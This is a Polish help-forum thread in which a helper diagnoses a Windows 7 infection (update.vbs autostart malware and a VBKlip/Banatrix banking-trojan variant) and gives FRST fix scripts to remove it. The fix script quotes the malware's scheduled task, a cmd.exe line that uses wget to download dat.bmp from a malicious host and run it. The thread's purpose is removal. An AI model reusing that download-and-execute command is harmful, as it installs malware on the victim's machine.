olijacek Opublikowano 10 Kwietnia 2015 Zgłoś Udostępnij Opublikowano 10 Kwietnia 2015 Witam od jakiegoś czasu AVG wywala że znalazł wirusa pierwszy był w pliku fire.exe nieznany. Potem hate.exe to wszystko w katalogu C:\Users\olila\AppData\Roaming Virustotal po przeskanowaniu pliku fire.exe : http://img.photobucket.com/albums/v282/olijacek/Przechwytywanie_zpseds77fjl.jpg Czy jest się czego obawiać czy avg pracuje poprawnie ? Dziękuję a pomoc... http://img.photobucket.com/albums/v282/olijacek/wirus_zpsq1mu3aj5.jpg Addition.txt FRST.txt Shortcut.txt gmer.txt Odnośnik do komentarza
picasso Opublikowano 14 Kwietnia 2015 Zgłoś Udostępnij Opublikowano 14 Kwietnia 2015 System jest zainfekowany dwoma typami: w Autostarcie uruchamia się malware update.vbs (pliki malware powstawały w tym samym przedziale czasowym co instalacja BSplayer PRO), w Harmonogramie zadań z kolei C:\ProgramData\dat.bmp (czyli wariant VBKlip/Banatrix). Działania do wdrożenia: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe Flash Player 16 ActiveX, Adobe Flash Player 16 NPAPI, AVG Web TuneUp, Spybot - Search & Destroy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Startup: C:\Users\olila\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs () Task: {8EEE3983-76EA-4F2F-8976-35675C6DC2B8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=By1vykaB59;setup.exe;1422133484 & start cmd /R dat.bmp Task: {FFEA7BD6-71D5-46AE-811F-D9D80A1F00D4} - System32\Tasks\{F9DC6CAF-D8FF-4391-8498-51137BA99E5A} => pcalua.exe -a "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk\brunins.exe" -d "G:\! WSZYSTKIE PROGRAMY INSTALKI\Drukarki\Uninstall-sterowniki druk" HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Policies\Explorer: [NoLogOff] 0 HKU\S-1-5-21-3236243999-3144956723-4226996683-1000\...\Run: [AdobeBridge] => [X] S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X] S3 cpuz136; \??\C:\Users\olila\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 IT9135BDA; System32\Drivers\IT9135BDA.sys [X] C:\ProgramData\dat.bmp C:\ProgramData\TEMP C:\Users\olila\AppData\Roaming\bsplayerpro.exe C:\Users\olila\AppData\Roaming\update.vbs C:\Windows\pss\update.vbs.Startup C:\Windows\SysWOW64\srvany.exe Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^olila^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^update.vbs" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Odnośnik do komentarza
olijacek Opublikowano 14 Kwietnia 2015 Autor Zgłoś Udostępnij Opublikowano 14 Kwietnia 2015 Dzięki za pomoc. Operacje wykonane. Załączam logi. Addition.txt Fixlog.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 15 Kwietnia 2015 Zgłoś Udostępnij Opublikowano 15 Kwietnia 2015 Wszystko pomyślnie wykonane. 1. Poprawki na szczątki po programach. Otwórz Notatnik i wklej w nim: BootExecute: autocheck autochk * sdnclean64.exe S2 KMService; C:\Windows\system32\srvany.exe [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] C:\Program Files (x86)\AVG Web TuneUp C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\wtu-secure-search.xml C:\Program Files (x86)\Spybot - Search & Destroy 2 C:\ProgramData\Spybot - Search & Destroy Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Zaprezentuj wynikowy fixlog.txt. 2. Na wszelki wypadek przeprowadź skanowanie za pomocą Malwarebytes Anti-Malware. Jeśli coś znajdzie, przedstaw wyniki. Odnośnik do komentarza
olijacek Opublikowano 15 Kwietnia 2015 Autor Zgłoś Udostępnij Opublikowano 15 Kwietnia 2015 Zadanie wykonane: Logi w załącznikach. Czy to już koniec ? MAMH.txt Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 16 Kwietnia 2015 Zgłoś Udostępnij Opublikowano 16 Kwietnia 2015 Tak, kończymy: 1. Usuń H:\FRST. Następnie jeszcze DelFix oraz czyszczenie folderów Przywracania systemu: KLIK. 2. Cały system do aktualizacji, stan obecny to brak SP1, IE11 i reszty łat: Platform: Windows 7 Ultimate (X64) OS Language: Polski (Polska) Internet Explorer Version 8 (Default browser: FF) Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się